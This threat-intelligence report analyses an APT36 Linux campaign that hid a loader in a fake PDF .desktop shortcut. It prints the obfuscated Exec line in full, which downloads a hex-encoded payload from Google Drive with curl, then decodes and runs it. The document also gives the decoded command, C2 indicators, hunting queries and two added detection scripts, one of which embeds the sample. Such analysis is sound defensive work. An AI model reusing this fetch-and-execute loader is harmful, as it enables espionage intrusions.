
Investigation Report: APT36 Malware Campaign Using Desktop Entry Files and Google Drive Payload Delivery

Pakistan-linked APT36 (Transparent Tribe) launched a new cyber-espionage campaign targeting Indian government and defense entities. Active in August 2025, the group used phishing ZIP files containing malicious Linux “.desktop” shortcuts that downloaded payloads from Google Drive. The malware created persistence, evaded detection, and connected to a WebSocket C2 server (seemysitelive[.]store). Investigators urge blocking the C2 domain, scanning for indicators of compromise, and tightening email and endpoint defenses.

Ayush Panwar
August 21, 2025
Green Alert
Last Update posted on
August 21, 2025

Executive Summary

APT36 — also known as Transparent Tribe, Mythic Leopard, Earth Karkaddan, or Operation C-Major — is a Pakistan-based advanced persistent threat (APT) group active since at least 2013. The group is primarily focused on cyber-espionage activities targeting Indian government entities, with a particular emphasis on defense personnel and related organizations. APT36 is well known for its persistent phishing campaigns and credential-harvesting operations used to gain access to sensitive environments.

In our recent investigations, we observed a new infection technique leveraging Linux desktop entry (.desktop) files as a malware delivery mechanism. The attack begins with a malicious ZIP archive containing a .desktop file disguised as a document (e.g., PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop). When executed, the loader downloads a dropper payload from Google Drive, stored there as hex-encoded strings. The malware then:

  1. Decodes the hex payload and writes it to /tmp/PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf-$(date +%s) (where date +%s provides a Unix timestamp).
  2. Adjusts permissions and executes the dropper binary.
  3. Opens a decoy PDF file in Firefox, creating the impression that a legitimate document has been accessed to reduce victim suspicion.

Once launched, the dropper performs several operations:

  • Executes anti-debugging and anti-sandbox checks.
  • Establishes persistence on the infected system.
  • Attempts to establish a connection with its command-and-control (C2) infrastructure using WebSockets.

Analysis

PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.zip : ZIP archive containing the malicious .desktop file

MD5 Hash : 6ac0fe0fa5d9af8193610d710a7da63c

SHA1 Hash : 3e3169c513c02126028480421fb341a167cb9fcd

SHA256 Hash : 34ad45374d5f5059cad65e7057ec0f3e468f00234be7c34de033093efc4dd83d

After unzipping the archive we get a .desktop file (PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop)

MD5 Hash : a484f85d132609a4a6b5ed65ece7d331

SHA1 Hash : 1982f09bfab3a6688bb80249a079db1a759214b7

SHA256 Hash : 6347f46d77a47b90789a1209b8f573b2529a6084f858a27d977bf23ee8a79113

A .desktop file is a plain text configuration file used primarily in Linux desktop environments to define application shortcuts and launchers. It provides metadata about an application, such as its name, icon, and the command to execute the program. These files allow an application to appear in system menus, on the desktop, or in panels, facilitating easy launching from graphical user interfaces.

Fig 1 : .desktop file with pdf icon impersonating a real pdf file

The malicious code is concealed within the icon configuration.

Fig 2 : Code Stored in .desktop file

Analysis for .desktop file

  1. Embedded Icon Data

# --- BEGIN EMBEDDED ICON DATA ---
# iVBORw0KGgqd1AvKicUBc7GuHI7XQwdKi/HWYzY53AMg1uzySt9pcU8vjp35LwaNYUW9Oqdg9oIc
# ... (Base64-encoded image data) ...
# --- END EMBEDDED ICON DATA ---

  • These lines contain an embedded icon image encoded in Base64 format.
  • This icon is used by the Linux desktop environment to visually represent the .desktop file.
  • Embedding the icon data helps disguise the file as a legitimate PDF document shortcut.
  • The malware hides itself "between" or alongside the icon data to avoid casual detection.

  2. [Desktop Entry] Header

[Desktop Entry]

  • Marks the beginning of the desktop entry configuration as per the Desktop Entry Specification.
  • Indicates this file defines how the desktop environment should treat this item (e.g., application shortcut).

  3. Name Field

Name=PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf

  • The displayed name of this shortcut, designed to look like a legitimate PDF file.
  • Using a plausible document name helps trick users into double-clicking.

  4. Exec Field

Exec=bash -c 'CTFuFt="/tmp/PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf-$(date +%s)"; niLThe="$(echo ZWFNWEpXPSItLWZhaWwgLS1sb2NhdGlvbiAtLXNob3ctZXJyb3IiOyBjdXJsICR7ZWFNWEpXfSAiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xVlFRaVR0NzhOM0twWUp6VmJFLTk1dUlMbk84NFd6Xy0iIHwgeHhkIC1yIC1w | base64 -d)"; eval "$niLThe" > "$CTFuFt" && chmod +x "$CTFuFt" && "$CTFuFt" & iuqdST="$(echo ZmlyZWZveCAtLW5ldy13aW5kb3cgImh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS9maWxlL2QvMWtuMExfNldZYmZVVXgwZG16d2ZBTERuemtWSEpBUFR1L3ZpZXc/dXNwPWRyaXZlX2xpbmsi | base64 -d)"; eval "$iuqdST" &'

  • This is the core malware execution command that runs when the .desktop file is executed.

Breakdown:

  • CTFuFt is a variable set to a file path in /tmp/ with the original PDF name appended by a Unix timestamp to create a unique filename.
  • niLThe is set by decoding a base64-encoded string. The decoded text is itself a shell command that downloads the hex-encoded payload and converts it back to binary; i.e. niLThe stores the following command:

curl --fail --location --show-error "https://drive.google.com/uc?export=download&id=1VQQiTt78N3KpYJzVbE-95uILnO84Wz_-" | xxd -r -p

  • The output of that command (the hex-decoded payload) is written to the file path $CTFuFt in /tmp.
  • The file is then given execute permissions (chmod +x).
  • The payload file is executed in the background (&).
  • Another base64-decoded command is stored in iuqdST which launches Firefox, opening a decoy PDF URL to mislead the user.

firefox --new-window "https://drive.google.com/file/d/1kn0L_6WYbfUUx0dmzwfALDnzkVHJAPTu/view?usp=drive_link"

  • Both payload execution and decoy PDF opening happen concurrently.
  • Essentially, this runs a hidden malicious payload while showing a fake legitimate document to the victim.

  5. Terminal Field

Terminal=false

  • Indicates that the command should run without opening a visible terminal window.
  • Helps hide the attack execution from user view.

  6. Type Field

Type=Application

  • Identifies this .desktop file as an application launcher.
  • This field tells the system that executing this file will run an application or command rather than opening a folder or link.

  7. Icon Field

Icon=application-pdf

  • Specifies the icon that the desktop environment should display for this file.
  • Set to a generic PDF icon to further disguise the file as a document rather than an executable.

  8. Categories Field

Categories=Utility;

  • Used by the desktop environment to categorize the application.
  • Here, it is marked as a utility, presumably to avoid suspicion.

  9. X-GNOME-Autostart-enabled Field

X-GNOME-Autostart-enabled=true

  • GNOME-specific key that marks this file to be automatically started when the user logs in.
  • This could be an attempt to establish persistence by running the malicious .desktop file on every session start.

  10. X-AppImage-Integrate Field

X-AppImage-Integrate=false

  • Prevents AppImage integration, a Linux feature related to portable apps.
  • Likely irrelevant for malware but included to maintain expected desktop file structure.

  11. Second Embedded Icon Data Block

# --- BEGIN EMBEDDED ICON DATA ---
# iVBORw0KGgqkmDCyTlAPgMnafl2BLX+gyT9xeiQFmRad7Yp+eSZ18TseFE3GYswghqPWxLb2pEjg
# ... (Base64-encoded image data) ...
# --- END EMBEDDED ICON DATA ---

  • Another Base64-encoded icon is embedded at the end of the file, perhaps to keep the file looking consistent or to defeat simpler detection.
  • This reinforces the disguise by embedding multiple icon images.
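As an added example that is not part of CloudSEK's report, the following Python script turns the field-level observations above into a triage check a defender can run over .desktop files: it parses the [Desktop Entry] keys, decodes any long Base64 runs in the Exec value, and lists the indicators discussed in this section (a document-like Name on an Application entry, a document icon, bash -c / eval / base64 -d / xxd -r -p pipelines, /tmp drops, chmod +x, the autostart key, and comment-line padding). The malicious sample embedded below reproduces the reported field layout and Exec line with the icon blocks shortened; the benign Firefox launcher, the indicator lists and the thresholds are constructed for this example.

```python
import base64
import re

# Constructed sample: the field layout reported for the malicious .desktop file.
# The Exec line is the one reproduced in the report; the icon blocks are shortened.
MALICIOUS_SAMPLE = """\
# --- BEGIN EMBEDDED ICON DATA ---
# iVBORw0KGgqd1AvKicUBc7GuHI7XQwdKi/HWYzY53AMg1uzySt9pcU8vjp35LwaNYUW9Oqdg9oIc
# --- END EMBEDDED ICON DATA ---
[Desktop Entry]
Name=PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf
Exec=bash -c 'CTFuFt="/tmp/PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf-$(date +%s)"; niLThe="$(echo ZWFNWEpXPSItLWZhaWwgLS1sb2NhdGlvbiAtLXNob3ctZXJyb3IiOyBjdXJsICR7ZWFNWEpXfSAiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xVlFRaVR0NzhOM0twWUp6VmJFLTk1dUlMbk84NFd6Xy0iIHwgeHhkIC1yIC1w | base64 -d)"; eval "$niLThe" > "$CTFuFt" && chmod +x "$CTFuFt" && "$CTFuFt" & iuqdST="$(echo ZmlyZWZveCAtLW5ldy13aW5kb3cgImh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS9maWxlL2QvMWtuMExfNldZYmZVVXgwZG16d2ZBTERuemtWSEpBUFR1L3ZpZXc/dXNwPWRyaXZlX2xpbmsi | base64 -d)"; eval "$iuqdST" &'
Terminal=false
Type=Application
Icon=application-pdf
Categories=Utility;
X-GNOME-Autostart-enabled=true
X-AppImage-Integrate=false
# --- BEGIN EMBEDDED ICON DATA ---
# iVBORw0KGgqkmDCyTlAPgMnafl2BLX+gyT9xeiQFmRad7Yp+eSZ18TseFE3GYswghqPWxLb2pEjg
# --- END EMBEDDED ICON DATA ---
"""

# Constructed benign launcher for comparison (no indicators expected).
BENIGN_SAMPLE = """\
[Desktop Entry]
Name=Firefox Web Browser
Exec=firefox %u
Terminal=false
Type=Application
Icon=firefox
Categories=Network;WebBrowser;
"""

# Long runs of the Base64 alphabet inside Exec are decoded and re-scanned.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Substrings that have no business in the launcher of a "document" (our choice).
SHELL_INDICATORS = ("bash -c", "eval ", "base64 -d", "xxd -r -p",
                    "curl ", "wget ", "/tmp/", "chmod +x")
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
DOCUMENT_ICONS = ("application-pdf", "x-office-document")


def parse_desktop(text):
    """Return the [Desktop Entry] keys and the number of '#' comment lines.

    Comment lines are counted because the sample buries its Exec line
    between large Base64 icon blocks written as comments.
    """
    entry, comment_lines, in_entry = {}, 0, False
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped.startswith("#"):
            comment_lines += 1
            continue
        if stripped.startswith("["):
            in_entry = stripped == "[Desktop Entry]"
            continue
        if in_entry and "=" in stripped:
            key, value = stripped.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry, comment_lines


def decode_b64_tokens(command):
    """Return printable-ASCII decodings of Base64 runs found in a command string."""
    decoded = []
    for token in B64_TOKEN.findall(command):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if raw.isascii() and raw.decode("ascii").isprintable():
            decoded.append(raw.decode("ascii"))
    return decoded


def triage_desktop(text):
    """Score one .desktop file: parsed fields, decoded blobs, indicators, verdict."""
    entry, comment_lines = parse_desktop(text)
    name = entry.get("Name", "")
    exec_cmd = entry.get("Exec", "")
    decoded = decode_b64_tokens(exec_cmd)
    indicators = []

    if entry.get("Type") == "Application" and name.lower().endswith(DOCUMENT_EXTS):
        indicators.append("launcher named like a document")
    if entry.get("Icon") in DOCUMENT_ICONS:
        indicators.append("document icon on a launcher")
    for needle in SHELL_INDICATORS:
        if needle in exec_cmd:
            indicators.append(f"Exec contains {needle.strip()!r}")
    for plain in decoded:
        for needle in SHELL_INDICATORS:
            if needle in plain:
                indicators.append(f"decoded Base64 contains {needle.strip()!r}")
    if entry.get("X-GNOME-Autostart-enabled", "").lower() == "true":
        indicators.append("autostart key set")
    if comment_lines > 10:  # threshold chosen for this example
        indicators.append(f"{comment_lines} comment lines (padding)")

    return {"name": name, "decoded": decoded, "comment_lines": comment_lines,
            "indicators": indicators,
            "verdict": "suspicious" if indicators else "benign"}


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        result = triage_desktop(sample)
        print(f"{label}: {result['verdict']}")
        for item in result["indicators"]:
            print("  -", item)
        for cmd in result["decoded"]:
            print("  decoded:", cmd)
```

Running the script against the malicious sample recovers the two embedded commands (the curl/xxd download pipeline and the Firefox decoy launch) without executing anything, and the verdict flips to benign for the ordinary Firefox launcher. The same parser can be driven by the find command in the hunting section to triage every .desktop file on a host.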

Fig 3 : Snapshot of the decoy pdf

Analysis for the dropped file (payload)

Payload file : ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=508a3568c56ed4f613cfafef23ff12c81ba627eb, with debug_info, not stripped

Section header analysis confirms this is a Go binary.

MD5 Hash : 566ddd4eb4ca8d4dd67b72ee7f944055

SHA1 Hash : df4db969a69efc1db59f4d3c596ed590ee059777

SHA256 Hash : 7a946339439eb678316a124b8d700b21de919c81ee5bef33e8cb848b7183927b

Reverse engineering the Go binary yields several findings:

1. Go Runtime & Stack Growth

  • This is Go’s way of checking if there's enough stack space and growing the goroutine stack when needed.

2. Randomization & Anti‑Analysis Checks

  • It seeds randomness with the current time.
  • Runs "dummy evasion checks" in a loop — these are anti‑debug / anti‑sandbox routines designed to waste time or detect instrumentation.
  • Typical malware trick to throw off emulators and static analyzers.

3. Client Creation

  • This function seems to build a network "client" object for later use.

4. Stealth / Persistence Modes

It branches on os.Args:

If the binary is launched with the argument "--hidden", it enters stealth install mode.

Otherwise, it installs persistence (likely adding itself to cron and a backup daemon).

5. Logging & Announcements

There are many calls to:

log.(*Logger).output(...)
main.main.Println.funcX
main.main.Printf.funcY

Where it logs messages like:

"Stealth client starting…"

"(PID: ...)"
"Attempting to connect to server: ..."

6. Command & Control Behavior

The loop at the end is critical:

  • That Base64 blob decodes to a WebSocket URL (ws://seemysitelive[.]store:8080/ws)
  • The client continually tries to connect to it.
  • If the connection fails, it logs then sleeps and retries — classic C2 (Command & Control) beaconing loop.

7. Syscall Usage

  • The binary invokes syscalls directly, which points to low-level process manipulation (possibly hiding, persistence, or privilege escalation).

Attribution

The C2 we found was running a websocket which returned “Welcome to Stealth Server”. Let’s check the C2 on Censys to identify if we can gather any “Stealth Server” related artifacts.

Fig 4. Censys Query results

We searched Censys for IP addresses using the following query:

services.http.response.html_tags:"<title>Stealth Server - Login</title>"

Results:

  • 4 IPs matched the query.
  • 3 of these were identified as malicious:
      • 2 are our C2 servers.
      • 1 is a previously attributed C2 associated with APT36.

C2 domain: seemysitelive[.]store 

C2 IP: 164.215.103.55 (ASN: AS 213373, IP Connect Inc)

Connecting to the WebSocket returns: "Welcome to Stealth Server"

Fig 5. Virustotal results for the domain

Fig 6. Response from the websocket

Diamond model for APT36

Impact

The use of Google Drive for payload delivery represents a significant evolution in the group's capabilities, introducing spear-phishing vectors that pose higher risks to Linux-based government and defense infrastructure.

Impact on Enterprises and Governments

Targeted Espionage on Critical Sectors: APT36 attacks focus on government and defense personnel, risking leakage of sensitive defense and strategic information that can compromise national security and organizational confidentiality.

Stealthy Persistence and Evasion: Using disguised .desktop files and sophisticated anti-debugging/anti-sandbox techniques, the malware persists undetected on Linux systems, allowing prolonged unauthorized access and espionage.

Supply Chain and Procurement Security Threat: The campaign uses procurement-themed phishing to infiltrate organizations, highlighting vulnerabilities in procurement workflows which can lead to operational disruption, fraud, and loss of trust.

Command & Control Over Non-Standard Protocols: Utilizing WebSocket communications on port 8080, the campaign maintains stealthy remote control and exfiltration capabilities, complicating detection and incident response efforts.

Indicators of Compromise (IOCs) 

File Hashes

Malicious ZIP Archive
Filename: PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.zip
MD5:      6ac0fe0fa5d9af8193610d710a7da63c
SHA1:     3e3169c513c02126028480421fb341a167cb9fcd
SHA256:   34ad45374d5f5059cad65e7057ec0f3e468f00234be7c34de033093efc4dd83d

Malicious .desktop File
Filename: PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop
MD5:      a484f85d132609a4a6b5ed65ece7d331
SHA1:     1982f09bfab3a6688bb80249a079db1a759214b7
SHA256:   6347f46d77a47b90789a1209b8f573b2529a6084f858a27d977bf23ee8a79113

Go Binary Payload
Filename: ELF 64-bit LSB executable (dropped payload)
MD5:      566ddd4eb4ca8d4dd67b72ee7f944055
SHA1:     df4db969a69efc1db59f4d3c596ed590ee059777
SHA256:   7a946339439eb678316a124b8d700b21de919c81ee5bef33e8cb848b7183927b

Network Indicators

Command & Control Infrastructure

Domain:   seemysitelive[.]store
IP:       164.215.103.55
ASN:      AS 213373 (IP Connect Inc)
Protocol: WebSocket (ws://)
Port:     8080
URL:      ws://seemysitelive[.]store:8080/ws
Banner:   "Welcome to Stealth Server"

Payload Delivery Infrastructure

Platform: Google Drive

Attacker Gmail : [email protected]
URL Pattern: https://drive.google.com/uc?export=download&id=[FILE_ID]
Decoy URL: https://drive.google.com/file/d/1kn0L_6WYbfUUx0dmzwfALDnzkVHJAPTu/view?usp=drive_link

File System Artifacts

Payload Drop Locations
Path Pattern: /tmp/PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf-[TIMESTAMP]
Example:      /tmp/PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf-1692547200
Permissions:  Executable (chmod +x applied)

Behavioral Indicators

Process Execution Patterns
Command: bash -c [BASE64_ENCODED_COMMANDS]
Pattern: curl --fail --location --show-error [GOOGLE_DRIVE_URL] | xxd -r -p
Process: Firefox launch with decoy PDF URL
Binary:  Go executable with anti-debugging features

Network Communication Patterns

Protocol:     WebSocket connections to port 8080
Retry Logic:  10-second intervals on connection failure
User-Agent:   Go HTTP client patterns
Persistence:  Continuous reconnection attempts
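The retry loop described under Command & Control Behavior (reconnect, sleep, retry at a fixed interval) leaves a regular pattern in connection logs that a defender can detect without knowing the C2 address in advance. The following Python beacon detector is an added example, not part of the report: it groups Zeek-style connection records by (src, dst, dport) and flags peers contacted at least five times at a near-constant interval, counting how many of those attempts never completed. The log lines, the internal host 10.0.0.5, the benign peer 203.0.113.10 and the thresholds are constructed for this example; the C2 IP and port are the ones listed in the IOCs above.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed Zeek-style connection records (tab separated):
# ts  src  dst  dport  conn_state   (REJ/S0/RSTO = connection never completed)
SAMPLE_CONN_LOG = (
    "2025-08-20T10:00:00Z\t10.0.0.5\t164.215.103.55\t8080\tREJ\n"
    "2025-08-20T10:00:03Z\t10.0.0.5\t203.0.113.10\t443\tSF\n"
    "2025-08-20T10:00:10Z\t10.0.0.5\t164.215.103.55\t8080\tREJ\n"
    "2025-08-20T10:00:20Z\t10.0.0.5\t164.215.103.55\t8080\tREJ\n"
    "2025-08-20T10:00:25Z\t10.0.0.5\t203.0.113.10\t443\tSF\n"
    "2025-08-20T10:00:31Z\t10.0.0.5\t164.215.103.55\t8080\tREJ\n"
    "2025-08-20T10:00:41Z\t10.0.0.5\t164.215.103.55\t8080\tREJ\n"
    "2025-08-20T10:00:51Z\t10.0.0.5\t164.215.103.55\t8080\tSF\n"
    "2025-08-20T10:01:30Z\t10.0.0.5\t203.0.113.10\t443\tSF\n"
)

FAILED_STATES = {"REJ", "S0", "RSTO"}


def parse_conn_log(text):
    """Parse the constructed log format into (timestamp, src, dst, dport, state) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport, state = line.split("\t")
        rows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst, int(dport), state))
    return rows


def find_beacons(rows, min_attempts=5, max_jitter_s=2.0):
    """Flag (src, dst, dport) triples contacted repeatedly at a near-constant interval.

    The median gap between attempts is the candidate beacon interval; a peer is
    reported only if every gap lies within max_jitter_s of that median.
    """
    by_peer = defaultdict(list)
    for ts, src, dst, dport, state in rows:
        by_peer[(src, dst, dport)].append((ts, state))

    hits = []
    for (src, dst, dport), events in by_peer.items():
        if len(events) < min_attempts:
            continue
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        interval = statistics.median(gaps)
        jitter = max(abs(g - interval) for g in gaps)
        if jitter > max_jitter_s:
            continue
        hits.append({
            "src": src, "dst": dst, "dport": dport,
            "attempts": len(events),
            "failed": sum(1 for _, s in events if s in FAILED_STATES),
            "interval_s": interval, "jitter_s": jitter,
        })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_conn_log(SAMPLE_CONN_LOG)):
        print(f"{hit['src']} -> {hit['dst']}:{hit['dport']} every ~{hit['interval_s']:.0f}s "
              f"({hit['attempts']} attempts, {hit['failed']} failed)")
```

On the sample the only peer reported is 164.215.103.55:8080 at a 10-second interval with five of six attempts failed, which matches the reconnect loop described for the dropper; the irregular HTTPS traffic to 203.0.113.10 is ignored. In production the same logic runs over a sliding window of real conn.log data, and the interval/jitter thresholds are tuned per environment.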

Remediation Recommendations

Network Security

  • Block C2 infrastructure:
      • Add seemysitelive[.]store and 164.215.103.55 to network blocklists
      • Monitor and block WebSocket connections to port 8080
      • Implement DNS sinkholing for the malicious domain

Endpoint Detection

  • Search for file hashes across all Linux systems
  • Hunt for files in /tmp/ matching the naming pattern
  • Identify systems with suspicious .desktop files

Email Security

  • Block ZIP attachments containing .desktop files
  • Implement additional scanning for procurement-themed emails
  • Review email logs for similar attachment patterns

Hunt Operations

1. Threat Hunting Queries

# Search for suspicious .desktop files
find / -name "*.desktop" -newer [recent_date] -exec grep -l "bash -c" {} \;

# Look for hex-decoded payloads
grep -r "xxd -r -p" /var/log/

# Find Go binaries in suspicious locations (file(1) reports "Go BuildID=..." for Go executables)
find /tmp /var/tmp -type f -executable -exec file {} \; | grep "Go BuildID"

2. Memory Analysis

   - Dump memory of suspicious Go processes
   - Analyze WebSocket connections in memory
   - Check for embedded configuration data

Appendix

ATT&CK Table

ATT&CK Tactics and Techniques

| ATT&CK Tactic | ATT&CK Technique ID | Technique Name | Description / Relevance |
| --- | --- | --- | --- |
| Initial Access | T1566 | Phishing | Delivery via phishing ZIP attachments containing malicious .desktop files |
| Execution | T1204.002 | User Execution: Malicious File | Execution of disguised .desktop files by users |
| Execution | T1064 | Scripting | Use of bash script commands in the .desktop Exec field to download payload |
| Persistence | T1543.003 | Create or Modify System Process: Systemd Service | Persistence via autostart .desktop files and likely cron/systemd services |
| Persistence | T1564.001 | Hide Artifacts: Hidden Files and Directories | Dropping payload in hidden /tmp with obfuscation |
| Defense Evasion | T1036 | Masquerading | Disguising malware as legitimate PDF shortcuts with icon spoofing |
| Defense Evasion | T1027.001 | Obfuscated Files or Information: Binary Padding | Large base64 icon data to hide malicious commands |
| Credential Access | T1110 | Brute Force / Credential Dumping (common in APT36 campaigns) | Credential harvesting focus in broader APT36 operations |
| Discovery | T1518 | Software Discovery | Reconnaissance on victim environment (host info gathering) |
| Command and Control | T1071 | Application Layer Protocol | Using WebSocket protocol for C2 communications |
| Command and Control | T1095 | Non-Application Layer Protocol | WebSocket is a non-standard C2 communication |
| Command and Control | T1105 | Ingress Tool Transfer | Downloading payload from Google Drive |
| Command and Control | T1571 | Non-Standard Port | C2 over uncommon port 8080 using WebSocket |

Reference

https://x.com/SinghSoodeep/status/1955860231109665108
